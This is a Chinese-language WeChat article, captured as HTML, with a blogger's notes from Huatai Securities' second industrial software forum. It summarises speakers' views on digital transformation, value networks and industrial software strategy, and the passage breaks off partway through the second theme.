      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483862&amp;idx=1&amp;sn=abc86fc485face4386c277b90a2f60a2</link>
      <description>华泰证券第二届工业软件论坛，主题：全球视角，中国路径。</description>
      <content:encoded><![CDATA[<p>
<span>闽南阿里</span> <span>2024-01-20 21:06</span> <span style="display: inline-block;">美国</span>
</p>

<p>华泰证券第二届工业软件论坛，主题：全球视角，中国路径。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=7e6e5357&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINxOt7Dt2dsTgg0oTrQ7J4cqw43rsMBV3ucrWDSpTbibgKalIGlfsMF8tibh6p7SAUADtDMLbM1eQPibQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="margin-bottom: 0px;"><br/></p><table cellpadding="0" cellspacing="0" valign="top" title="" summary=""><tbody><tr><td style="border-width: 0pt;vertical-align: top;padding: 2pt 3pt;" width="642"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:20.0pt;color:black;"><span style="font-weight: bold;font-size: 20px;">目录</span></p></td></tr><tr><td style="border-width: 0pt;vertical-align: top;padding: 2pt 3pt;word-break: break-all;" width="653.3333333333334"><p style="margin:0in;font-size:11.0pt;"><span style="font-size: 20px;"><span style="font-size: 20px;font-family: Calibri;" lang="zh-CN">- </span><span style="font-size: 20px;font-family: &#34;Segoe UI Emoji&#34;;" lang="x-none">🤹‍♂️ </span><span style="font-size: 20px;font-family: &#34;Microsoft YaHei&#34;;" lang="x-none">序言：怀揣梦想，走进论坛</span></span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">缘起</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">问答</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">追求</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-size: 20px;"><span style="font-size: 20px;font-family: Calibri;" lang="zh-CN">- </span><span style="font-size: 20px;font-family: &#34;Segoe UI Emoji&#34;;" lang="x-none">🎯 </span><span style="font-size: 20px;font-family: &#34;Microsoft YaHei&#34;;" lang="x-none">主题</span><span style="font-size: 20px;font-family: Calibri;" lang="en-US">1</span><span style="font-size: 20px;font-family: &#34;Microsoft YaHei&#34;;" lang="x-none">：数字化转型路径探索</span></span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">工业软件的云化、平台化、智能化</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">中国工业软件产品流还处在单向阶段</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">企业数字化在跟随趋同后必然是主动创新</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">数字化正从车间往上，走进写字楼</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">从投资到收益需要战略的理念和定力</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">技术成不了护城河</span><span style="font-family:
  &#34;Microsoft YaHei&#34;;" lang="x-none">！</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">沉着冷静并深度思考工业软件的精准策略</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-size: 20px;"><span style="font-size: 20px;font-family: Calibri;" lang="zh-CN">- </span><span style="font-size: 20px;font-family: &#34;Segoe UI Emoji&#34;;" lang="x-none">🧩</span><span style="font-size: 20px;font-family: &#34;Microsoft YaHei&#34;;" lang="x-none">主题</span><span style="font-size: 20px;font-family: Calibri;" lang="en-US">2</span><span style="font-size: 20px;font-family: &#34;Microsoft YaHei&#34;;" lang="x-none">：解构传统，重构网络</span></span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">传统价值链加速解构并重构为新的价值网络</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">产业网络让人均产能优异</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">制造业升级的内核是价值链加速重构</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">消费互联网和工业互联网的交集就是工业软件</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-size: 20px;"><span style="font-size: 20px;font-family: Calibri;" lang="zh-CN">- </span><span style="font-size: 20px;font-family: &#34;Segoe UI Emoji&#34;;" lang="x-none">🔄</span><span style="font-size: 20px;font-family: &#34;Microsoft YaHei&#34;;" lang="x-none">主题</span><span style="font-size: 20px;font-family: Calibri;" lang="en-US">3</span><span style="font-size: 20px;font-family: &#34;Microsoft YaHei&#34;;" lang="x-none">：数字化模型和闭环反馈</span></span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">数字化技术使用发展路线图即数字化三维模型</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">数字主线如同一场唯美的恋曲</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">数字主线贯穿和连接产品链、价值链和资产连</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">制造和现场反馈于产品</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">健壮执行和敏捷优化的平衡</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-size: 20px;"><span style="font-size: 20px;font-family: Calibri;" lang="zh-CN">- </span><span style="font-size: 20px;font-family: &#34;Segoe UI Emoji&#34;;" lang="x-none">💫 </span><span style="font-size: 20px;font-family: &#34;Microsoft YaHei&#34;;" lang="x-none">主题</span><span style="font-size: 20px;font-family: Calibri;" lang="en-US">4</span><span style="font-size: 20px;font-family: &#34;Microsoft YaHei&#34;;" lang="x-none">：数字化设计技术</span></span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">顶级客户蝶变思维</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">巨头的功能轰炸和国内的路径</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">新工艺带动设计方法的改变</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">数字化设计技术和四大科学发展范式</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-size: 20px;"><span style="font-size: 20px;font-family: Calibri;" lang="zh-CN">- </span><span style="font-size: 20px;font-family: &#34;Segoe UI Emoji&#34;;" lang="x-none">💎 </span><span style="font-size: 20px;font-family: &#34;Microsoft YaHei&#34;;" lang="x-none">主题</span><span style="font-size: 20px;font-family: Calibri;" lang="en-US">5</span><span style="font-size: 20px;font-family: &#34;Microsoft YaHei&#34;;" lang="x-none">：数字化价值实现</span></span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">把握</span><span style="font-family:Calibri;" lang="en-US">AI</span><span style="font-family:
  &#34;Microsoft YaHei&#34;;" lang="x-none">产业大周期有三个阶段</span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">知识变现的载体是从工具到产品再到平台和生态</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"></span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">高端起家，极致专业化四处渗透</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"></span></p><p style="margin:0in;font-size:11.0pt;"><span style="font-family:Calibri;" lang="zh-CN">    - </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none">工业软件的新型价值曲线</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="x-none"></span></p><p style="margin:0in;font-family:Calibri;font-size:11.0pt;"> </p></td></tr></tbody></table><h1 style="margin:0in;font-size:16.0pt;color:#14324D;"><span style="font-family:
&#34;Segoe UI Emoji&#34;;">🤹‍♂️ </span><span style="font-family:&#34;微软雅黑 Light&#34;;">序言：怀揣梦想，走进论坛</span></h1><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">缘起</h2><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;color: black;">我对工业软件的学习始于华泰计算机首席谢春生的《工业软件研究框架》20讲，我的背景是纯粹的计算机专业，且从事金融IT工作，与制造业并无直接交集，但随着对工业软件的深入了解，我逐渐认识到这一领域不仅是软件工程的基石，更是现代软件发展的引擎。</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;color: black;">软件工程中的许多核心概念，如生产线、连续集成、版本控制、精益生产等，都源于制造业的实践和理论。这些概念在工业软件中得到了充分的应用和提炼，进而影响了整个软件工程领域的发展。此外，近年来在软件领域备受瞩目的数字化转型、敏捷开发、平台工程、混沌工程和可观测性等新兴概念，也是从工业软件领域中逐渐成长和发展起来的。</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;color: black;">我希望从更本源的地方去理解软件产业数字化的第一性原理。在我看来，经过长时间实践验证和市场竞争检验的工业软件领域，能够为我们提供全新的视角和思考方式。通过深入研究工业软件的发展历程和应用实践，我们可以重新审视和思考软件工程的理论与实践，进一步推动软件产业的创新和发展。</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;color: black;">总而言之，工业软件作为现代制造业的核心组成部分，不仅在生产制造领域发挥着重要作用，同时也对整个软件工程领域产生了深远的影响。通过学习和研究工业软件，我们可以更好地理解软件产业数字化的本质和未来发展趋势，为金融IT和其他相关行业提供更多有价值的启示和借鉴。</p><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">问答</h2><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">论坛上西门子陆云强先生微信群发问：</span><span style="color:#FA0000;">为什么微软不收购工业软件</span><span style="color:black;">？</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">普遍的回答是工业软件姓“工”，我的回答是微软做的是软件这个“工业”的工业软件。</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">在美国，农业、畜牧业可以是“工业”，在中国，软件和集成电路都是“产业”，软件产业也是需要数字化的领域，现代软件不是简单的工程应用，也需要科学发展的四大范式加持。</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;"><span lang="zh-CN">我也提个问题：消费互联网和工业互联网，或互联网</span><span lang="en-US">app</span><span lang="zh-CN">和工业软件，哪个更值得软件产业自身的数字化借鉴呢？如果你还有点迷茫，容我稍后做一期消费互联网巨头的数字化方法论的笔记和分析。</span></p><h2 style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:14.0pt;color:#276296;">追求</h2><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;"><span lang="zh-CN">“做软件行业的工业软件,做软件产业的数字化”,可以是我专业的初衷、追求与梦想。当阳光洒满香格里拉酒店</span><span lang="en-US">,</span><span lang="zh-CN">我满怀憧憬地走进了此次工业软件论坛。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">在论坛现场,国际领军团队和国内的少壮派，对工业软件和数字化转型，做了迥异而独特的分享，智慧之光宛如星空璀璨，启迪前行方向，这个美好经历，值得我记录和分享。</p><p style="margin-right: 0in;margin-left: 0in;font-size: 8pt;color: black;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="en-US">*<span lang="zh-CN">笔记的疏漏错误难免，部分内容是查询相关资料后补充，</span><span lang="en-US">5</span><span lang="zh-CN">大主题由</span><span lang="en-US">chatgpt</span><span lang="zh-CN">归纳得出，论坛具体内容以各位讲者的现场发言为准。</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN"></span></p><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
&#34;Segoe UI Emoji&#34;;" lang="zh-CN">🎯 </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">主题</span><span style="font-family:Calibri;" lang="en-US">1</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">：数字化转型路径探索</span></h1><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">工业软件的发展趋势是云化、平台化、智能化</span><span style="font-family:
Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">华泰</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">梁红</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">云化是数字化的基础，实现全领域业务链条的数据化，进而打通数据链；</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">平台化促进多方参与和开放创新，形成跨产业链协同；</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">智能化是提升软件价值的关键，</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">通过软件升级来弥补硬件的缺陷，硬件越复杂，对软件升级改造的空间也就越大</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">。</span></p></li></ul><h2 style="margin:0in;font-size:14.0pt;color:#276296;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">中国工业软件产品流还处在单向阶段</span><span style="font-family:Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">西门子</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">陆云强</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">中国工业软件产品目前主要面向国内市场，尚处于“单向输出”的格局，与国外单项冠军软件公司的双向交流模式有所不同。</span></p></li><li><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;" lang="zh-CN">发问：你是否认真看完别人的产品，是否感觉“看来和我们以前想的完全不一样”</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="en-US"> </span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="zh-CN">。</span></p></li><li><p><br/></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">中国工业软件企业国际化程度、自主创新能力和服务制造业深度有待提高，需要加大研发投入和培育国际视野的人才。</span><span style="color: rgba(0, 0, 0, 0.9);font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></p></li></ul><h2 style="margin:0in;font-size:14.0pt;color:#276296;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">企业数字化在跟随趋同后必然是主动创新</span><span style="font-family:
Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">西门子</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">陆云强</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">跟随型公司是“</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">你找客户</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">”，企业在数字化过程中更注重在已有的知识和经验基础上进行验证和修正，通过观察他人的成功和失败来指导自身的决策。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">创新型公司更倾向于主动寻找新的数字化解决方案，采用探索性的方法，预测未来趋势，并通过实验验证新的理念，达到“</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">客户找你</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">”。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">跟随型公司和创新型公司，二者最初是制造能力的竞争，制造能力的竞争中后发不一定有优势，制造</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">能力趋同</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">后才是创新能力的竞争。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">创新能力的竞争更注重满足用户需求，用户更愿意等待，即主动满足客户需求，甚至超越客户的期望。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000197" data-ratio="0.545766590389016" width="553" data-type="png" data-w="874" height="301" src="https://wechat2rss.xlab.app/img-proxy/?k=ed69fbef&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPRC3QFHBIhSGwlSqVQdEeHvx1goCFECTeYbVFksMTf7WPuUoTObFCiaiaw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 style="margin:0in;font-size:14.0pt;color:#276296;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">数字化正从车间往上，走进写字楼</span><span style="font-family:Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">机工智库</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">陈琛</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">数字化转型的工厂，</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">IT</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">工程师的数量，已经超过了机械工程师。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">如果要寻找或满足多变的客户需求，那需要研发设计人员。</span></p></li></ul><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">从投资到收益需要战略的理念和定力</span><span style="font-family:Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">机工智库</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">陈琛</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">在追求回报时，若感受不到可能是因为投入不足，企业需要通过正确认识价值来源、持续精准投入、</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">价值网络的构建</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">、经典场景的塑造以及</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">找准纵身一跃的创新者</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">，共创未来制造。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">企业投入经历单项应用和企业集成两个阶段后，真正的收益体现在产业链集成和产业生态系统的高级阶段，强调了全方位的战略和理念在取得企业收益方面的关键作用。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000201" data-ratio="0.5138888888888888" width="649" data-type="png" data-w="1080" height="333" src="https://wechat2rss.xlab.app/img-proxy/?k=024078ea&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPR1ZXCOQkqwcyRRddMwW0IIEic0ibxO0lWTDcGibyLxOjVIVMel6tAFAibmA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 style="margin:0in;font-size:14.0pt;color:#276296;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">技术成不了护城河</span><span style="font-family:Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">少壮派！</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">论坛中提到的</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">技术成不了护城河</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">，强调了护城河需要更多元的因素，如品牌、极致专业化、客户关系、生态系统等。这启示我们在技术创新的同时，更要注重全方位的能力构建。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">技术成不了永久的护城河，因为技术迭代快、技术浪潮短暂、获取途径多样、用户需求多变、综合创新是新需求、品牌客户关系和生态更难复制。单一依赖技术的竞争优势可能是短暂的，持久的成功需要更全面的战略和能力。</span></p></li></ul><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;Microsoft YaHei&#34;;" lang="zh-CN">沉着冷静并深度思考工业软件的精准策略</span><span style="font-family:
&#34;Microsoft YaHei&#34;;" lang="en-US"> </span><span style="font-family:Calibri;" lang="en-US">- </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">宝信</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">丛力群</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:12.0pt;">工业软件迫切需要再场景实践中反复打磨，通过反复迭代取得成功；</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:12.0pt;color:#FA0000;">改变弯道超车的思维方式、运动式推进方式、工程型开发模式，要面向行业普遍需求</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:12.0pt;color:black;">，选择具备基础、市场前景广、增值空间大的若干重点环节，不能四面出击；</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:12.0pt;">回归工业软件发展以知识为核心的本源，面向高端，不要想低成本抢占市场，也不要想挣快钱。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000200" data-ratio="0.5278810408921933" width="717" data-type="png" data-w="1076" height="378" src="https://wechat2rss.xlab.app/img-proxy/?k=5cf6edb3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPRdlU955ic82icibictSpwcIIBibmRSOUhMcgjZQI2aYNzSWnpaHtAGSDWNfA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
&#34;Segoe UI Emoji&#34;;" lang="zh-CN">🧩</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">主题</span><span style="font-family:Calibri;" lang="en-US">2</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">：解构传统，重构网络</span></h1><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">传统价值链加速解构并重构为新的价值网络</span><span style="font-family:
Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">机工智库</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">陈琛</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">传统线性价值链被拆分为多条子链。这些子链之间解构,重构,形成网络化、生态化、共创的新价值网络,整体效率和质量大幅提升,成本下降,灵活性增强。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">传统线性串接的</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">价值链</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">，包括研发设计、生产制造、市场营销、服务。这个传统价值链证被拆分为产品链、技术链、服务链、信息链和能源链。</span></p></li><ul type="circle" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">产品链包括原材料、零件、部件、整机和回收；</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">技术链包括工艺技术、集成技术、装备技术和制造工程技术；</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">服务链包括价值的体现（营销）、价值的传播（物流、</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">ota</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">）以及增值服务；信息链包括产品信息构建、供应链信息管理、管理信息集成、客户信息分析和管理；</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">能源链包括能源的生产、传输、存储和使用。</span></p></li></ul><li 